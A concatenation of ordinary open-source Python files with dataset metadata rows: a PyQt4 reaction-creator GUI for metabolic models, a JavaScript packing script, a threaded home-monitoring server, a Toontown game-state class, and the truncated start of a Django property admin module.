self.NewReaction = None
return None
if self.tblSubRow == 0 and self.tblProdRow == 0:
self.showErrorMessage('At least one reagent must be defined.')
self.NewReaction = None
return None
#print('\nid=\"{}\"\nname=\"{}\"'.format(Id, Name))
# print self.tblSub.rowCount(), self.tblSubRow
# print self.tblProd.rowCount(), self.tblProdRow
Reag = {}
exReac = False
for s_ in range(self.tblSub.rowCount()):
coeff = -abs(float(self.tblSub.item(s_, 0).text()))
Sid = str(self.tblSub.item(s_, 1).text()).strip()
if Sid in self._flist:
exReac = True
Reag[Sid] = coeff
for p_ in range(self.tblProd.rowCount()):
coeff = abs(float(self.tblProd.item(p_, 0).text()))
Sid = str(self.tblProd.item(p_, 1).text()).strip()
if Sid in self._flist:
exReac = True
if Sid in Reag:
Reag[Sid] += coeff
else:
Reag[Sid] = coeff
for r_ in tuple(Reag):
if Reag[r_] == 0.0:
Reag.pop(r_)
print('removing zero coefficient reagent: {}'.format(r_))
self.NewReaction = {'reversible': reversible,
'id': Id,
'name': Name,
'is_exchange': exReac,
'is_balanced': self.ISBALANCED,
'reagents': Reag,
'upper_bound': self._Bupper,
'lower_bound': self._Blower
}
sub = ''
prod = ''
for r_ in Reag:
coeff = abs(Reag[r_])
if Reag[r_] < 0.0:
if coeff == 1.0:
sub += '%s + ' % (r_)
else:
sub += '{%s} %s + ' % (coeff, r_)
else:
if coeff == 1.0:
prod += '%s + ' % (r_)
else:
prod += '{%s} %s + ' % (coeff, r_)
if reversible:
eq = '%s\n\t%s\n%s' % (sub[:-3], '<==>', prod[:-2])
else:
eq = '%s\n\t%s\n%s' % (sub[:-3], '-->', prod[:-2])
#quit_msg = "Add reaction:\n\n{}\n\t{}\n{}".format(sub,rev,prod)
quit_msg = eq
reply = QtGui.QMessageBox.question(self, 'Do you want to add the reaction \"{}\" to the model?'.format(Id),
quit_msg, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
self.statusBar.showMessage('Reaction {} added to model'.format(Id))
print(self.NewReaction)
QtGui.qApp.quit()
else:
print('Try again')
self.NewReaction = None
def initUI(self):
# create labels
lblSub = QtGui.QLabel('Substrates')
lblSub.setAlignment(QtCore.Qt.AlignCenter)
lblProd = QtGui.QLabel('Products')
lblProd.setAlignment(QtCore.Qt.AlignCenter)
lblId = QtGui.QLabel('Reaction id')
lblId.setAlignment(QtCore.Qt.AlignCenter)
lblNm = QtGui.QLabel('Reaction name')
lblNm.setAlignment(QtCore.Qt.AlignCenter)
# create text boxes
self.txtId = QtGui.QTextEdit()
self.txtId.setMaximumHeight(25)
self.txtId.setText('NewReactionId')
self.txtNm = QtGui.QTextEdit()
self.txtNm.setMaximumHeight(25)
self.txtNm.setText('NewReactionName')
self.txtBal = QtGui.QTextEdit()
self.txtBal.setMaximumHeight(40)
# create static lists
self.lstSub = QtGui.QListWidget()
self.lstSub.setSelectionMode(self.lstSub.ExtendedSelection)
self.lstProd = QtGui.QListWidget()
self.lstProd.setSelectionMode(self.lstProd.ExtendedSelection)
# populate lists
cntr = 0
for m_ in self._mlist:
cntr += 1
name = 'None'
comp = 'None'
if m_ in self._ccdict:
comp = self._ccdict[m_]
if m_ in self._cndict:
name = self._cndict[m_]
item = QtGui.QListWidgetItem(m_)
item.setToolTip('{}\t{}'.format(name, comp))
if m_ in self._flist:
item.setForeground(self._fixColour)
self.lstSub.addItem(item.clone())
self.lstProd.addItem(item)
# if cntr == 20: break
# create buttons
self.btAddSub = QtGui.QPushButton('Add substrate(s)')
QtCore.QObject.connect(self.btAddSub, QtCore.SIGNAL('clicked()'), self.addSelectedSubstrates)
self.btAddProd = QtGui.QPushButton('Add product(s)')
QtCore.QObject.connect(self.btAddProd, QtCore.SIGNAL('clicked()'), self.addSelectedProducts)
self.btReverse = QtGui.QPushButton('Reversible')
self.btReverse.setCheckable(True)
self.btReverse.setChecked(True)
# create tables
self.tblSub = QtGui.QTableWidget()
self.tblSub.setSortingEnabled(True)
self.tblSub.insertColumn(0)
self.tblSub.insertColumn(1)
self.tblSub.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblSub.verticalHeader().setVisible(False)
QtCore.QObject.connect(self.tblSub, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblSubRow = 0
self.tblProd = QtGui.QTableWidget()
self.tblProd.setSortingEnabled(True)
self.tblProd.insertColumn(0)
self.tblProd.insertColumn(1)
self.tblProd.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblProd.verticalHeader().setVisible(False)
self.tblProdRow = 0
QtCore.QObject.connect(self.tblProd, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblBal = QtGui.QTableWidget()
self.tblBal.setMaximumHeight(150)
self.tblBal.insertRow(0)
self.tblBal.insertRow(1)
self.tblBal.insertRow(2)
self.tblBal.verticalHeader().setVisible(False)
self.tblBalCol = 0
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
addReAction = QtGui.QAction('&Add reaction and exit', self)
addReAction.setShortcut('Ctrl+A')
addReAction.setStatusTip('Add reaction to model and exit')
addReAction.triggered.connect(self.getNewReaction)
fileMenu = menuBar.addMenu('&Model')
fileMenu.addAction(exitAction)
fileMenu.addAction(addReAction)
subAddAction = QtGui.QAction('&Add', self)
subAddAction.triggered.connect(self.addSelectedSubstrates)
subDelAction = QtGui.QAction('&Delete selected', self)
subDelAction.triggered.connect(self.deleteSubstrates)
subDelAllAction = QtGui.QAction('&Delete all', self)
subDelAllAction.triggered.connect(self.deleteAllSubstrates)
subMenu = menuBar.addMenu('&Substrate')
subMenu.addAction(subAddAction)
subMenu.addAction(subDelAction)
subMenu.addAction(subDelAllAction)
prodAddAction = QtGui.QAction('&Add', self)
prodAddAction.triggered.connect(self.addSelectedProducts)
prodDelAction = QtGui.QAction('&Delete selected', self)
prodDelAction.triggered.connect(self.deleteProducts)
prodDelAllAction = QtGui.QAction('&Delete all', self)
prodDelAllAction.triggered.connect(self.deleteAllProducts)
prodMenu = menuBar.addMenu('&Product')
prodMenu.addAction(prodAddAction)
prodMenu.addAction(prodDelAction)
prodMenu.addAction(prodDelAllAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('{} ready'.format('Model'))
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.statusBar, 0, 2, 1, 2)
grid.addWidget(lblId, 1, 0)
grid.addWidget(self.txtId, 1, 1)
grid.addWidget(lblNm, 1, 2)
grid.addWidget(self.txtNm, 1, 3)
grid.addWidget(lblSub, 2, 0, 1, 2)
grid.addWidget(lblProd, 2, 2, 1, 2)
grid.addWidget(self.lstSub, 3, 0, 1, 2)
grid.addWidget(self.lstProd, 3, 2, 1, 2)
grid.addWidget(self.btAddSub, 4, 0)
grid.addWidget(self.btReverse, 4, 1, 1, 2)
grid.addWidget(self.btAddProd, 4, 3)
grid.addWidget(self.tblSub, 5, 0, 1, 2)
grid.addWidget(self.tblProd, 5, 2, 1, 2)
grid.addWidget(self.tblBal, 6, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle('Reaction Creator')
self.show()
def createReaction(mod):
"""
Create a reaction using the graphical Reaction Creator
- *mod* a CBMPy model object
"""
cfdict = {}
cndict = {}
ccdict = {}
for s_ in mod.species:
cfdict[s_.getId()] = s_.getChemFormula()
cndict[s_.getId()] = s_.getName()
ccdict[s_.getId()] = s_.compartment
app = QtGui.QApplication([])
ex = ReactionCreator(mod.getReactionIds(), mod.getSpeciesIds(), mod.getBoundarySpeciesIds(), cfdict, cndict, ccdict)
app.exec_()
newR = ex.NewReaction
del app, ex
if newR == None:
return None
else:
R = CBMReaction(newR['id'], name=newR['name'], reversible=newR['reversible'])
R.is_balanced = newR['is_balanced']
R.is_exchange = newR['is_exchange']
for r_ in newR['reagents']:
R.createReagent(r_, newR['reagents'][r_])
mod.getSpecies(r_).setReagentOf(newR['id'])
mod.addReaction(R, create_default_bounds=False)
mod.createReactionLowerBound(newR['id'], newR['lower_bound'])
mod.createReactionUpperBound(newR['id'], newR['upper_bound'])
return R
class CBFileDialogue(QtGui.QWidget):
_appTitle = 'Open file'
work_dir = None
model_file = None
mode = None
def __init__(self, work_dir, mode='open', filters=None):
super(CBFileDialogue, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.mode = mode
if mode == 'save':
self._appTitle = 'Save file'
self.initUI()
def initUI(self):
#self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
# self.setHidden(True)
self.__dlg__ = QtGui.QFileDialog(self)
if self.mode == 'open':
#self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir))
elif self.mode == 'save':
#self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir))
self.model_file = os.path.normpath(self.model_file)
def fileDialogue(work_dir=None, mode='open', filters=None):
if work_dir == None:
work_dir = os.getcwd()
if mode in ['open', 'save']:
app = QtGui.QApplication([])
fileApp = CBFileDialogue(work_dir, mode=mode, filters=filters)
model_file = fileApp.model_file
fileApp.__dlg__.done(1)
app.exit()
if mode == 'open':
return model_file
else:
return True
class ViewSVG(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ViewSVG'
def __init__(self, filename):
super(ViewSVG, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.filename = os.path.abspath(filename)
print('\nViewing file: {}'.format(filename))
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# webkit panel
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem(self.filename).boundingRect()
webview = QGraphicsWebView()
# webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile(self.filename)))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width() + 10, br.height() + 10)
# view.show()
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(view, 1, 0, 4, 4)
grid.addWidget(self.statusBar, 5, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadViewSVG(filename):
app = QtGui.QApplication([])
ex = ViewSVG(filename)
app.exec_()
class ValueSlider(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ValueSlider'
def __init__(self):
super(ValueSlider, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def initUI(self):
# create panels
#self.txtId = QtGui.QTextEdit()
l1a = QtGui.QLabel(self)
l1a.setText('Property')
sld1 = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld1.setTickPosition(sld1.TicksBelow)
sld1_min = -100
sld1_max = 100
sld1.setMinimum(sld1_min)
sld1.setMaximum(sld1_max)
sld1.setTickInterval((sld1_min - sld1_max) / 10.0)
sld1.setSingleStep(0.1)
sld1.setFocusPolicy(QtCore.Qt.NoFocus)
sld1.valueChanged[int].connect(self.changeValue)
self.l1b = QtGui.QLabel(self)
self.l1b.setText('0.0')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(l1a, 0, 0, 1, 1)
grid.addWidget(self.l1b, 0, 1, 1, 1)
grid.addWidget(sld1, 0, 2, 1, 5)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
#grid.addWidget(menuBar, 0, 0)
#grid.addWidget(self.statusBar, 0, 1)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 280, 170)
self.setWindowTitle(self._appTitle)
self.show()
def changeValue(self, value):
getattr(self, 'l1b').setText('{}'.format(value))
def loadSlider():
app = QtGui.QApplication([])
ex = ValueSlider()
app.exec_()
data = "<DATASTART><return>{}</return>"
if __name__ == '__main__':
print(os.sys.argv)
if os.sys.argv[1] == 'fileOpen':
filename = fileDialogue(work_dir=None, mode='open', filters=None)
print(data.format(filename))
os.sys.exit(0)
# subprocess.check_output(['python', '_qtloader.py', 'fileOpen']).split('<DATASTART>')[1].strip()
# template widget
"""
class SmallAppBasicGrid(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'SmallAppBaseGrid'
def __init__(self):
super(SmallAppBasicGrid, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0,0,153,alpha=255)
self._errColour = QtGui.QColor(255,0,0,alpha=255)
self._goodColour = QtGui.QColor(0,100,0,alpha=255)
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(self.statusBar, 2, 0, 1, 2)
self.setLayout(grid)
self.setGeometry(self.mousePos.x()-75, self.mousePos.y()-75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadBasicApp(mod):
app = QtGui.QApplication([])
ex = SmallAppBasicGrid()
app.exec_()
"""
# template microGUI
"""
class MicroGUI(QtGui.QWidget):
_appTitle = 'MicroGUI'
def __init__(self):
super(MicroGUI, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.initUI()
def initUI(self):
self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
self.setHidden(True)
# action code (this example is for opening a file dialogue)
self.model_file = str(QtGui.QFileDialog.getOpenFileName(self, 'Open file', os.getcwd()))
def loadMicroGUI(*args):
app = QtGui.QApplication([])
mGUI = OpenFileDialogue()
appTitle = mGUI._appTitle
del mGUI, app
return
"""
"""
import sys
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem("C:\your_interactive_svg.svg").boundingRect()
webview = QGraphicsWebView()
webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile("C:\your_interactive_svg.svg")))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width()+10, br.height()+10)
view.show()
sys.exit(app.exec_())
"""
|
gpl-3.0
| 6,245,848,769,703,354,000 | 35.823864 | 148 | 0.568523 | false | 3.626749 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/static/scripts/pack_scripts.py
|
1
|
1952
|
#!/usr/bin/env python
import sys, os
from glob import glob
from subprocess import call
from shutil import copyfile
from os import path
# Scripts that should not be packed -- just copied
do_not_pack = set()
cmd = "java -jar ../../scripts/yuicompressor.jar --charset utf-8 --type js %(fname)s -o packed/%(fname)s"
# cmd = "java -jar ../../scripts/compiler.jar --compilation_level SIMPLE_OPTIMIZATIONS --js %(fname)s --js_output_file packed/%(fname)s"
# If specific scripts specified on command line, just pack them, otherwise pack
# all.
def recursive_glob( pattern, excluded_dirs ):
"""
Returns all items that match pattern in root and subdirectories.
"""
a_dir, a_pattern = path.split( pattern )
# Skip excluded dirs.
if a_dir in excluded_dirs:
return []
# Search current dir.
# print a_dir, a_pattern
rval = glob( pattern )
for item in glob( path.join( a_dir, "*" ) ):
if path.isdir( item ):
rval.extend( recursive_glob( path.join( item, a_pattern ), excluded_dirs ) )
return rval
# Get files to pack.
if len( sys.argv ) > 1:
to_pack = sys.argv[1:]
else:
to_pack = recursive_glob( "*.js", [ "packed" ] )
for fname in to_pack:
d = dict( fname=fname )
packed_fname = path.join( 'packed', fname )
# Only copy if full version is newer than packed version.
if path.exists( packed_fname ) and ( path.getmtime( fname ) < path.getmtime( packed_fname ) ):
print "Packed is current: %s" % fname
continue
print "%(fname)s --> packed/%(fname)s" % d
# Create destination dir if necessary.
dir, name = os.path.split( packed_fname )
if not path.exists( dir ):
print "Creating needed directory %s" % dir
os.makedirs( dir )
# Copy/pack.
if fname in do_not_pack:
copyfile( fname, path.join( packed_fname ) )
else:
out = call( cmd % d, shell=True )
|
gpl-3.0
| -941,269,120,476,930,600 | 28.134328 | 136 | 0.618852 | false | 3.549091 | false | false | false |
Skydes/Monitoring
|
src/main.py
|
1
|
2622
|
#!/usr/bin/env python
'''
Copyright (c) 2016, Paul-Edouard Sarlin
All rights reserved.
Project: Autonomous Monitoring System
File: main.py
Date: 2016-08-08
Author: Paul-Edouard Sarlin
Website: https://github.com/skydes/monitoring
'''
from multiprocessing import Queue, Lock
from Queue import Empty
from rocket import Rocket
from threading import Thread
import signal
import time
import cv2
import json
import logging, logging.handlers
from capture import Capture
from processing import Processing
from cloud import Dropbox
from server import *
QUEUE_MAXSIZE = 10
PORT = 8000
# Setup logging
logFormatter = logging.Formatter(fmt='%(levelname)-8s %(module)-15s %(asctime)-20s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
fileHandler = logging.handlers.RotatingFileHandler("./log/app.log", maxBytes=30000, backupCount=5)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
# Setup configuration
with open("conf.json") as json_file:
app.conf.update(json.load(json_file))
# Initialize and configure threads
app.pre_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.post_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.server_queue = Queue(maxsize=1)
app.conf_lock = Lock()
# Make main procezs ignore SIGNINT
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
app.capture_th = Capture(app.pre_queue, app.conf, app.conf_lock)
app.processing_th = Processing(app.pre_queue, app.post_queue, app.conf, app.conf_lock)
app.dropbox_th = Dropbox(app.post_queue, app.server_queue, app.conf, app.conf_lock)
app.capture_th.setDevice("video0")
# Launch threads
app.dropbox_th.start()
app.processing_th.start()
app.capture_th.start()
logging.info("Threads started.")
# Restore SIGNINT handler
signal.signal(signal.SIGINT, original_sigint_handler)
# Launch server
rocket_server = Rocket(('localhost', PORT), 'wsgi', {'wsgi_app': app})
app.server_th = Thread(target=rocket_server.start, name='rocket_server')
app.server_th.start()
logging.getLogger("Rocket").setLevel(logging.INFO)
logging.info("Server started.")
try:
while app.server_th.is_alive():
app.server_th.join(1)
except (KeyboardInterrupt, SystemExit):
rocket_server.stop()
logging.info("Server stopped.")
app.capture_th.stop()
app.capture_th.join()
app.processing_th.stop()
app.processing_th.join()
app.dropbox_th.stop()
app.dropbox_th.join()
cv2.destroyAllWindows()
|
bsd-3-clause
| -800,108,648,192,495,700 | 26.893617 | 130 | 0.745995 | false | 3.273408 | false | false | false |
ToonTownInfiniteRepo/ToontownInfinite
|
toontown/coghq/MintInterior.py
|
1
|
10229
|
from direct.directnotify import DirectNotifyGlobal
from toontown.battle import BattlePlace
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.showbase import BulletinBoardWatcher
from pandac.PandaModules import *
from otp.distributed.TelemetryLimiter import RotationLimitToH, TLGatherAllAvs
from toontown.toon import Toon
from toontown.toonbase import ToontownGlobals
from toontown.hood import ZoneUtil
from toontown.toonbase import TTLocalizer
from toontown.toontowngui import TTDialog
from toontown.toonbase import ToontownBattleGlobals
from toontown.coghq import DistributedMint
from otp.nametag import NametagGlobals
class MintInterior(BattlePlace.BattlePlace):
notify = DirectNotifyGlobal.directNotify.newCategory('MintInterior')
def __init__(self, loader, parentFSM, doneEvent):
BattlePlace.BattlePlace.__init__(self, loader, doneEvent)
self.parentFSM = parentFSM
self.zoneId = loader.mintId
self.fsm = ClassicFSM.ClassicFSM('MintInterior', [State.State('start', self.enterStart, self.exitStart, ['walk', 'teleportIn', 'fallDown']),
State.State('walk', self.enterWalk, self.exitWalk, ['push',
'sit',
'stickerBook',
'WaitForBattle',
'battle',
'died',
'teleportOut',
'squished',
'DFA',
'fallDown',
'stopped']),
State.State('stopped', self.enterStopped, self.exitStopped, ['walk', 'teleportOut', 'stickerBook']),
State.State('sit', self.enterSit, self.exitSit, ['walk', 'died', 'teleportOut']),
State.State('push', self.enterPush, self.exitPush, ['walk', 'died', 'teleportOut']),
State.State('stickerBook', self.enterStickerBook, self.exitStickerBook, ['walk',
'battle',
'DFA',
'WaitForBattle',
'died',
'teleportOut']),
State.State('WaitForBattle', self.enterWaitForBattle, self.exitWaitForBattle, ['battle',
'walk',
'died',
'teleportOut']),
State.State('battle', self.enterBattle, self.exitBattle, ['walk', 'teleportOut', 'died']),
State.State('fallDown', self.enterFallDown, self.exitFallDown, ['walk', 'died', 'teleportOut']),
State.State('squished', self.enterSquished, self.exitSquished, ['walk', 'died', 'teleportOut']),
State.State('teleportIn', self.enterTeleportIn, self.exitTeleportIn, ['walk',
'teleportOut',
'quietZone',
'died']),
State.State('teleportOut', self.enterTeleportOut, self.exitTeleportOut, ['teleportIn',
'FLA',
'quietZone',
'WaitForBattle']),
State.State('DFA', self.enterDFA, self.exitDFA, ['DFAReject', 'teleportOut']),
State.State('DFAReject', self.enterDFAReject, self.exitDFAReject, ['walkteleportOut']),
State.State('died', self.enterDied, self.exitDied, ['teleportOut']),
State.State('FLA', self.enterFLA, self.exitFLA, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['teleportIn']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
def load(self):
self.parentFSM.getStateNamed('mintInterior').addChild(self.fsm)
BattlePlace.BattlePlace.load(self)
self.music = base.loadMusic('phase_9/audio/bgm/CHQ_FACT_bg.ogg')
def unload(self):
self.parentFSM.getStateNamed('mintInterior').removeChild(self.fsm)
del self.music
del self.fsm
del self.parentFSM
BattlePlace.BattlePlace.unload(self)
def enter(self, requestStatus):
self.fsm.enterInitialState()
base.transitions.fadeOut(t=0)
base.localAvatar.inventory.setRespectInvasions(0)
base.cr.forbidCheesyEffects(1)
self._telemLimiter = TLGatherAllAvs('MintInterior', RotationLimitToH)
def commence(self = self):
NametagGlobals.setMasterArrowsOn(1)
self.fsm.request(requestStatus['how'], [requestStatus])
base.playMusic(self.music, looping=1, volume=0.8)
base.transitions.irisIn()
mint = bboard.get(DistributedMint.DistributedMint.ReadyPost)
self.loader.hood.spawnTitleText(mint.mintId, mint.floorNum)
self.mintReadyWatcher = BulletinBoardWatcher.BulletinBoardWatcher('MintReady', DistributedMint.DistributedMint.ReadyPost, commence)
self.mintDefeated = 0
self.acceptOnce(DistributedMint.DistributedMint.WinEvent, self.handleMintWinEvent)
if __debug__ and 0:
self.accept('f10', lambda : messenger.send(DistributedMint.DistributedMint.WinEvent))
self.confrontedBoss = 0
def handleConfrontedBoss(self = self):
self.confrontedBoss = 1
self.acceptOnce('localToonConfrontedMintBoss', handleConfrontedBoss)
def exit(self):
NametagGlobals.setMasterArrowsOn(0)
bboard.remove(DistributedMint.DistributedMint.ReadyPost)
self._telemLimiter.destroy()
del self._telemLimiter
base.cr.forbidCheesyEffects(0)
base.localAvatar.inventory.setRespectInvasions(1)
self.fsm.requestFinalState()
self.loader.music.stop()
self.music.stop()
self.ignoreAll()
del self.mintReadyWatcher
def enterWalk(self, teleportIn = 0):
BattlePlace.BattlePlace.enterWalk(self, teleportIn)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterPush(self):
BattlePlace.BattlePlace.enterPush(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterWaitForBattle(self):
MintInterior.notify.debug('enterWaitForBattle')
BattlePlace.BattlePlace.enterWaitForBattle(self)
if base.localAvatar.getParent() != render:
base.localAvatar.wrtReparentTo(render)
base.localAvatar.b_setParent(ToontownGlobals.SPRender)
def exitWaitForBattle(self):
MintInterior.notify.debug('exitWaitForBattle')
BattlePlace.BattlePlace.exitWaitForBattle(self)
def enterBattle(self, event):
MintInterior.notify.debug('enterBattle')
self.music.stop()
BattlePlace.BattlePlace.enterBattle(self, event)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterTownBattle(self, event):
mult = ToontownBattleGlobals.getMintCreditMultiplier(self.zoneId)
base.localAvatar.inventory.setBattleCreditMultiplier(mult)
self.loader.townBattle.enter(event, self.fsm.getStateNamed('battle'), bldg=1, creditMultiplier=mult)
def exitBattle(self):
MintInterior.notify.debug('exitBattle')
BattlePlace.BattlePlace.exitBattle(self)
self.loader.music.stop()
base.playMusic(self.music, looping=1, volume=0.8)
def enterStickerBook(self, page = None):
BattlePlace.BattlePlace.enterStickerBook(self, page)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterSit(self):
BattlePlace.BattlePlace.enterSit(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterZone(self, zoneId):
pass
def enterTeleportOut(self, requestStatus):
MintInterior.notify.debug('enterTeleportOut()')
BattlePlace.BattlePlace.enterTeleportOut(self, requestStatus, self.__teleportOutDone)
def __processLeaveRequest(self, requestStatus):
hoodId = requestStatus['hoodId']
if hoodId == ToontownGlobals.MyEstate:
self.getEstateZoneAndGoHome(requestStatus)
else:
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
def __teleportOutDone(self, requestStatus):
MintInterior.notify.debug('__teleportOutDone()')
messenger.send('leavingMint')
messenger.send('localToonLeft')
if self.mintDefeated and not self.confrontedBoss:
self.fsm.request('FLA', [requestStatus])
else:
self.__processLeaveRequest(requestStatus)
def exitTeleportOut(self):
MintInterior.notify.debug('exitTeleportOut()')
BattlePlace.BattlePlace.exitTeleportOut(self)
def handleMintWinEvent(self):
MintInterior.notify.debug('handleMintWinEvent')
if base.cr.playGame.getPlace().fsm.getCurrentState().getName() == 'died':
return
self.mintDefeated = 1
if 1:
zoneId = ZoneUtil.getHoodId(self.zoneId)
else:
zoneId = ZoneUtil.getSafeZoneId(base.localAvatar.defaultZone)
self.fsm.request('teleportOut', [{'loader': ZoneUtil.getLoaderName(zoneId),
'where': ZoneUtil.getToonWhereName(zoneId),
'how': 'teleportIn',
'hoodId': zoneId,
'zoneId': zoneId,
'shardId': None,
'avId': -1}])
def enterDied(self, requestStatus, callback = None):
MintInterior.notify.debug('enterDied')
def diedDone(requestStatus, self = self, callback = callback):
if callback is not None:
callback()
messenger.send('leavingMint')
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
return
BattlePlace.BattlePlace.enterDied(self, requestStatus, diedDone)
def enterFLA(self, requestStatus):
MintInterior.notify.debug('enterFLA')
self.flaDialog = TTDialog.TTGlobalDialog(message=TTLocalizer.ForcedLeaveMintAckMsg, doneEvent='FLADone', style=TTDialog.Acknowledge, fadeScreen=1)
def continueExit(self = self, requestStatus = requestStatus):
self.__processLeaveRequest(requestStatus)
self.accept('FLADone', continueExit)
self.flaDialog.show()
def exitFLA(self):
MintInterior.notify.debug('exitFLA')
if hasattr(self, 'flaDialog'):
self.flaDialog.cleanup()
del self.flaDialog
|
mit
| 7,421,334,415,014,637,000 | 41.620833 | 154 | 0.655587 | false | 3.601761 | false | false | false |
signalfire/django-property
|
homes/admin.py
|
1
|
2271
|
from mapwidgets.widgets import GooglePointFieldWidget
from django.contrib import admin
from django.contrib.gis.db import models
from django.utils.translation import ugettext as _
from homes.models import Block, Banner, SEO, SearchPrice, Branch, PropertyTenure, PropertyType, Alert, MediaType
class SearchPriceAdmin(admin.ModelAdmin):
fields = ('type', 'label', 'price')
class BranchAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
fieldsets = (
(_('General'), {
'fields': ['name', 'slug', 'status']
}),
(_('Address'), {
